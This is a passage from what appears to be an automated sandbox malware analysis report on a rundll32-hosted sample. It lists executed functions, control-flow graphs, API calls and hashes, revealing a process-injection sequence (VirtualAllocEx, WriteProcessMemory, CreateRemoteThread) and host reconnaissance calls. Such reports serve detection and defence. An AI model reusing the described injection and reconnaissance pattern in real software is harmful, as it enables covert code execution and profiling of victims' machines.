49724->49723 49725->49666 49726->49665 49729 1ff4cb051e2 49727->49729 49728 1ff4cb0523e 49728->49719 49729->49728 49730 1ff4cb0523c NtReadVirtualMemory 49729->49730 49730->49728 50699 180005780 50700 180055c42 50699->50700 50703 180055c62 50700->50703 50702 180055c4b 50704 180055cf3 50703->50704 50705 180055d61 VirtualAlloc 50704->50705 50706 180055de2 50705->50706 50706->50706 50707 180055ecf VirtualAlloc 50706->50707 50708 180055eed 50707->50708 50708->50702

                                                                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                                                                      Function 0000000180055C62 Relevance: 24.3, APIs: 2, Strings: 14, Instructions: 326memoryCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 0 180055c62-180055cee 1 180055cf3-180055cf7 0->1 2 180055d02-180055d0d 1->2 2->2 3 180055d0f-180055d17 2->3 3->1 4 180055d19-180055d1d 3->4 5 180055d2e 4->5 6 180055d1f-180055d2c call 1800562b2 4->6 8 180055d32-180055ddd call 180056312 * 3 VirtualAlloc 5->8 6->8 16 180055de2-180055ec1 8->16 16->16 17 180055ec7-180055ee7 call 180056162 VirtualAlloc 16->17 20 180056148-18005615d 17->20 21 180055eed-180055f43 call 180056192 17->21 21->20 24 180055f49-180055f54 21->24 25 180055f58-180055f5e 24->25 26 180055f60-180055f69 25->26 27 180055f6f-180055f72 25->27 26->27 28 180055f6b 26->28 29 180055f74-180055f7d 27->29 30 180055f83-180055fa3 call 180056192 27->30 28->27 29->30 31 180055f7f 29->31 30->25 34 180055fa5-180055fb1 30->34 31->30 34->20 35 180055fb7-180055fc0 34->35 36 180055fc6-180055fce 35->36 37 180056055-180056063 35->37 39 180055fd2-180055fea 36->39 37->20 38 180056069-180056072 37->38 40 180056074-180056079 38->40 41 1800560ee-1800560f8 call 180056172 38->41 42 18005604c-18005604f 39->42 43 180055fec 39->43 45 180056082-180056092 40->45 51 1800560fa-18005610b 41->51 52 18005612b-180056143 call 1800561c2 41->52 42->39 47 180056051 42->47 46 180055ff2-180056006 43->46 45->20 57 180056098-1800560a4 45->57 49 180056008-18005603f call 180056192 * 2 46->49 50 180056044-180056047 46->50 47->37 49->50 50->46 55 180056049 50->55 51->52 56 18005610d 51->56 52->20 55->42 60 180056112-180056129 56->60 61 1800560a6-1800560b0 57->61 62 1800560df-1800560e8 57->62 60->52 65 1800560b2-1800560b8 61->65 62->45 67 1800560ea 62->67 68 1800560bf-1800560c3 65->68 69 1800560ba-1800560bd 65->69 67->41 71 1800560c6-1800560d8 68->71 69->71 71->65 73 1800560da 71->73 73->62
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3330959887.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3330909360.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331127970.0000000180073000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331172905.0000000180074000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331243879.0000000180077000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331287027.000000018007C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331335828.000000018007D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                                                                                      • String ID: $=$.$3$MC1t$^qE?$bIfh$e$eBOO$ioAU$k$l$nEhx$r$sYP
                                                                                                                                                                                                                                                                      • API String ID: 4275171209-1846638993
                                                                                                                                                                                                                                                                      • Opcode ID: 43cc6e01d3af8756f24444348060f7009d82bdb323a80667e739bd446e939b0d
                                                                                                                                                                                                                                                                      • Instruction ID: 0aba12783aff90d63c6f286ccc0a077e7894613a05cce7ad61c0a4bd09775adc
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 43cc6e01d3af8756f24444348060f7009d82bdb323a80667e739bd446e939b0d
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7CD1103270168887EB55CF25E4147AD7BA1F749BC8F488025FE8D5BB85EE39DA49C700
                                                                                                                                                                                                                                                                      Function 000001FF4CAF4D00 Relevance: 10.8, APIs: 7, Instructions: 282COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 150 1ff4caf4d00-1ff4caf4daf GetUserNameW GetComputerNameExW 151 1ff4caf4dc7-1ff4caf4df1 GetComputerNameExW call 1ff4cb04ad0 150->151 152 1ff4caf4db1-1ff4caf4dc1 call 1ff4cafb4c0 150->152 157 1ff4caf4e58-1ff4caf4e92 call 1ff4cb02750 call 1ff4caedfc0 151->157 158 1ff4caf4df3-1ff4caf4e1a GetTokenInformation 151->158 152->151 172 1ff4caf4eaa-1ff4caf4ed1 GetNativeSystemInfo 157->172 173 1ff4caf4e94-1ff4caf4ea5 call 1ff4cb03de0 157->173 159 1ff4caf4e4e-1ff4caf4e53 call 1ff4cb04000 158->159 160 1ff4caf4e1c-1ff4caf4e28 158->160 159->157 161 1ff4caf4e3e-1ff4caf4e49 call 1ff4cb03de0 160->161 162 1ff4caf4e2a-1ff4caf4e39 call 1ff4cb03de0 160->162 161->159 162->161 175 1ff4caf4ee8-1ff4caf4eec 172->175 176 1ff4caf4ed3-1ff4caf4ee6 172->176 173->172 178 1ff4caf4eee-1ff4caf4efd 175->178 179 1ff4caf4f17-1ff4caf4f2d call 1ff4cb03de0 175->179 177 1ff4caf4f01-1ff4caf4f15 call 1ff4cb03de0 176->177 182 1ff4caf4f32-1ff4caf4f42 177->182 178->177 179->182 185 1ff4caf4f89-1ff4caf4fb9 GetAdaptersInfo 182->185 186 1ff4caf4f44-1ff4caf4f84 call 1ff4cb03b90 call 1ff4cb03de0 call 1ff4cb03b90 * 2 182->186 191 1ff4caf4fdd-1ff4caf4fe3 185->191 192 1ff4caf4fbb-1ff4caf4fdc call 1ff4cafb4e0 * 2 185->192 186->185 191->192 194 1ff4caf4fe5-1ff4caf4ffd call 1ff4cafb4c0 GetAdaptersInfo 191->194 194->192 203 1ff4caf4fff-1ff4caf500c 194->203 205 1ff4caf5012-1ff4caf5015 203->205 205->192 206 1ff4caf5017-1ff4caf5018 205->206 207 1ff4caf501f-1ff4caf5031 call 1ff4cad93e0 206->207 210 1ff4caf5045-1ff4caf504c 207->210 211 1ff4caf5033-1ff4caf5043 call 1ff4cb03de0 207->211 210->192 212 1ff4caf5052-1ff4caf5062 call 1ff4cb03de0 210->212 211->207 212->205
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3333096106.000001FF4CAD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF4CAD1000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4cad1000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: InfoName$AdaptersComputer$InformationNativeSystemTokenUser
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1596153048-0
                                                                                                                                                                                                                                                                      • Opcode ID: d368cccdfef71661db8cb31f21f933e0a353851399cf2fd5481ceac7886dac6e
                                                                                                                                                                                                                                                                      • Instruction ID: d75a71647335e16d5204bedfa28c6f6e0c251375c2fba80c83d207dfebb8f3da
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d368cccdfef71661db8cb31f21f933e0a353851399cf2fd5481ceac7886dac6e
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32A1A530218F058FEB54EB15E8667EBB7E5FF94300F40457DA44AC3291EAB4D946CB92
                                                                                                                                                                                                                                                                      Function 0000000273F41380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62injectionsleepmemoryCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                      control_flow_graph 217 273f41380-273f413cc Sleep VirtualAllocEx 218 273f41456-273f41466 217->218 219 273f413d2-273f41400 WriteProcessMemory 217->219 220 273f41402-273f4143a CreateRemoteThread 219->220 221 273f41453 219->221 220->218 222 273f4143c-273f4143e 220->222 221->218 223 273f4144e-273f41451 222->223 224 273f41440-273f41448 WaitForSingleObject 222->224 223->218 224->223
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3331451655.0000000273F41000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000273F40000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331409929.0000000273F40000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3331451655.0000000273F85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_273f40000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AllocCreateMemoryObjectProcessRemoteSingleSleepThreadVirtualWaitWrite
                                                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                                                      • API String ID: 3172812169-2766056989
                                                                                                                                                                                                                                                                      • Opcode ID: 7fcec4437536d1c811a67ff0d3e935be9d4b92fa0fac673d0b509e6aa8ba7f62
                                                                                                                                                                                                                                                                      • Instruction ID: 70ca693b3c1452cbeb4233b6b91bedeb956dc212f3bce1284f7759b325db5040
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7fcec4437536d1c811a67ff0d3e935be9d4b92fa0fac673d0b509e6aa8ba7f62
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F117F22709E9042F6A0CF26BC08B5666A0B789FF4F644324EFBD17BE5DB38C6059605
                                                                                                                                                                                                                                                                      Function 000001FF4CAEF3A0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 215threadprocessCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3333096106.000001FF4CAD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF4CAD1000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4cad1000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Thread32$CreateFirstNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                                      • API String ID: 3779972765-4108050209
                                                                                                                                                                                                                                                                      • Opcode ID: c2136968b619a1c25bf9ca9a098df95eb749b5ae94065cfc9453c6e842ee3bcc
                                                                                                                                                                                                                                                                      • Instruction ID: 130b3ce302a632e6cd1fcbf65161b32e72b8faedfb790ef99c022f570c99af2e
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c2136968b619a1c25bf9ca9a098df95eb749b5ae94065cfc9453c6e842ee3bcc
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E9715F30218B498FE794EF29D855BEBB7E5FF88300F50457DA58DC3292DBB094468B92
                                                                                                                                                                                                                                                                      Function 00007DF459570100 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 214COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000003.2476801129.00007DF459570000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF459570000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_3_7df459570000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CreateSnapshotToolhelp32
                                                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                                                      • API String ID: 3332741929-2766056989
                                                                                                                                                                                                                                                                      • Opcode ID: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
                                                                                                                                                                                                                                                                      • Instruction ID: 4037b94948a7d9021533d63a5c9d24bbc455437d2f8887dd752fed62c7c95525
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE71CD3161494C8FEB94EF68C858BAD37E1FB98355F104226E81ED73A0DB74D954CB84
                                                                                                                                                                                                                                                                      Function 000001FF4CAD1600 Relevance: 1.7, APIs: 1, Instructions: 169threadCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3333096106.000001FF4CAD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF4CAD1000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4cad1000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ExitThreadUser
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3424019298-0
                                                                                                                                                                                                                                                                      • Opcode ID: 08f32d5bea543a41f381197dcaa5b21a13284e4198c1253caaeec1b6dd19c5dc
                                                                                                                                                                                                                                                                      • Instruction ID: d57d51d66012de59d098690238c4056b668bdf21f280062ca13bd8723b8dc030
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08f32d5bea543a41f381197dcaa5b21a13284e4198c1253caaeec1b6dd19c5dc
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B251D274108E094FE748EF28E8597F677E1FB56311F10127DE49AC32A2DA78E802CB95
                                                                                                                                                                                                                                                                      Function 000001FF4CADCCE0 Relevance: 1.6, APIs: 1, Instructions: 114libraryloaderCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3333096106.000001FF4CAD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF4CAD1000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4cad1000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AddressProcedure
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3653107232-0
                                                                                                                                                                                                                                                                      • Opcode ID: 64a4c363e66e8fcb324c2d013a85a570e217f1f41a485886b1e3891cf8e103dc
                                                                                                                                                                                                                                                                      • Instruction ID: a1c81268ac38ecb6163904c4fc687e26d8d816332a4eaa8d396f5ac05eb3d3f5
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 64a4c363e66e8fcb324c2d013a85a570e217f1f41a485886b1e3891cf8e103dc
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2131B231118B194BD668AF08EC467FBB7E1FB85310F50167EE5C6C3252E670A8868BD7
                                                                                                                                                                                                                                                                      Function 000001FF4CAE55C0 Relevance: .9, Instructions: 926COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3333096106.000001FF4CAD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF4CAD1000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4cad1000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CreateFirstSnapshotThread32Toolhelp32
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 490256885-0
                                                                                                                                                                                                                                                                      • Opcode ID: 8947cd77792b9eb167b6165044dfe8b86d8111add7710d331631fdbc473ca148
                                                                                                                                                                                                                                                                      • Instruction ID: 992fb10a2c04b70258473829160b5c5857c99ce5a9d0d06986ab27bedc115690
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8947cd77792b9eb167b6165044dfe8b86d8111add7710d331631fdbc473ca148
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40727330118F198FE7A4EF18D895BE677E0FB98304F1545BD944DC72A6DB70A846CB82
                                                                                                                                                                                                                                                                      Function 000001FF4CAD17B0 Relevance: .4, Instructions: 355COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3333096106.000001FF4CAD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF4CAD1000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4cad1000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: e20a959d714a7abf9f0da5987a6fc1497fd2130fdd83c0d3aa6bad73de8a86e0
                                                                                                                                                                                                                                                                      • Instruction ID: 052c845032224b4fddabf5d64021b30ddb7b463968e7974c4ab850a8206e9499
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e20a959d714a7abf9f0da5987a6fc1497fd2130fdd83c0d3aa6bad73de8a86e0
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7C1D134118E4A8FE754EF58E8687EAB7E1FF55310F5051BDE48AC32A2DBB09842CB51
                                                                                                                                                                                                                                                                      Function 000001FF4CAD71B0 Relevance: .1, Instructions: 140COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3333096106.000001FF4CAD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF4CAD1000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4cad1000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: 27eee718951805be4d6d661cb21cbd310f36feb23d9644bec408e17137dbdd0c
                                                                                                                                                                                                                                                                      • Instruction ID: 625b1b42bb5f769cbff26682836d39bb1860882f84071f84d02946569100898b
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27eee718951805be4d6d661cb21cbd310f36feb23d9644bec408e17137dbdd0c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3416270124A498FF348DF28D8557ABB7E1FB48314F50567DE45AC32D6DBB88846CB81
                                                                                                                                                                                                                                                                      Function 000001FF4CB04360 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3333096106.000001FF4CAD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF4CAD1000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4cad1000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: 246b04183441d9db0d4c236240df2ca26f18e78107733016fa740d2a375581b5
                                                                                                                                                                                                                                                                      • Instruction ID: 3c40f27ff9888784dce4c2a0249dac45be2b69f9156dddc64d1259297dc5eba4
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 246b04183441d9db0d4c236240df2ca26f18e78107733016fa740d2a375581b5
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 38412CB151CB488FE6749F09A8467FAB7E0FB99720F00492FD5C983652DA71A4428BC3
                                                                                                                                                                                                                                                                      Function 000001FF4CB045F0 Relevance: .1, Instructions: 82COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3333096106.000001FF4CAD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF4CAD1000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4cad1000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: 7425b9f205f2e48f6743ce85b3d4803992b94f2dd7c42288ff67dbf43d2a16d5
                                                                                                                                                                                                                                                                      • Instruction ID: 91b0fdbf1bce117b770b78392351e430b6d1d50d603601e4c17dcc51bda03405
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7425b9f205f2e48f6743ce85b3d4803992b94f2dd7c42288ff67dbf43d2a16d5
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB218E7061DB559BE754DB09E8467EAB7E4FB88721F200A2FE448C3761E6749481CB83
                                                                                                                                                                                                                                                                      Function 000001FF4CB03F40 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3333096106.000001FF4CAD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF4CAD1000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4cad1000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: 38f81910f3a60e41c97a405c41efcb50c28e990bd7599c8c7593531c701bee66
                                                                                                                                                                                                                                                                      • Instruction ID: 9d127c771c200b6550c94bcccba11fa3a3c51ee2db2b50040c12ac479bfda934
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 38f81910f3a60e41c97a405c41efcb50c28e990bd7599c8c7593531c701bee66
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9911A23061DB458FEB549B09A84A7FBB7E0FB98321F00592FE489C2660D7B594818783
                                                                                                                                                                                                                                                                      Function 000001FF4CB04BE0 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3333096106.000001FF4CAD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF4CAD1000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4cad1000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: 4459b4d784854b5074084b1eb2e58009c50c2c7bf0fd286647bf740f6eacac18
                                                                                                                                                                                                                                                                      • Instruction ID: 1d11bae061754288af553dbc522c308d8f8876fcc44082df536b3202bee2edd9
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4459b4d784854b5074084b1eb2e58009c50c2c7bf0fd286647bf740f6eacac18
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A311B231658F4A8FEA64AF4998467BA73D4EB48315F40443EE449C26A1D6B598818B83
                                                                                                                                                                                                                                                                      Function 000001FF4CB051C0 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3333096106.000001FF4CAD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF4CAD1000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4cad1000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: c9efb2dc69225788838bd08ce1b571aed7e5ff7df66dff9cf99eed66fee9a7a8
                                                                                                                                                                                                                                                                      • Instruction ID: 88b2bcfd009d4dad83e70b8958b68b7a6c41b0d504b783514ce30f6674cc5c75
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c9efb2dc69225788838bd08ce1b571aed7e5ff7df66dff9cf99eed66fee9a7a8
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6011B230658B494FEB54DB0898467BA73E4EB89315F40443EE889C2A50D6B598818B83
                                                                                                                                                                                                                                                                      Function 000001FF4C9CDACE Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000003.2100231573.000001FF4C990000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FF4C990000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_3_1ff4c990000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: 633259c266d87a5b95fda6ce05470889e09af076b0dc8ff2f0ee963c60a24a3d
                                                                                                                                                                                                                                                                      • Instruction ID: e75792e44c43d65b8426ee454bc692ce9b2abd3913e387ec89dae5beef860442
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 633259c266d87a5b95fda6ce05470889e09af076b0dc8ff2f0ee963c60a24a3d
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6611F97061CB888FD6A0DF4998857AABBE1FBD8711F54062FE48CD3210D7319441C793
                                                                                                                                                                                                                                                                      Function 000001FF4CAE7A50 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3333096106.000001FF4CAD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FF4CAD1000, based on PE: false
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_1ff4cad1000_rundll32.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
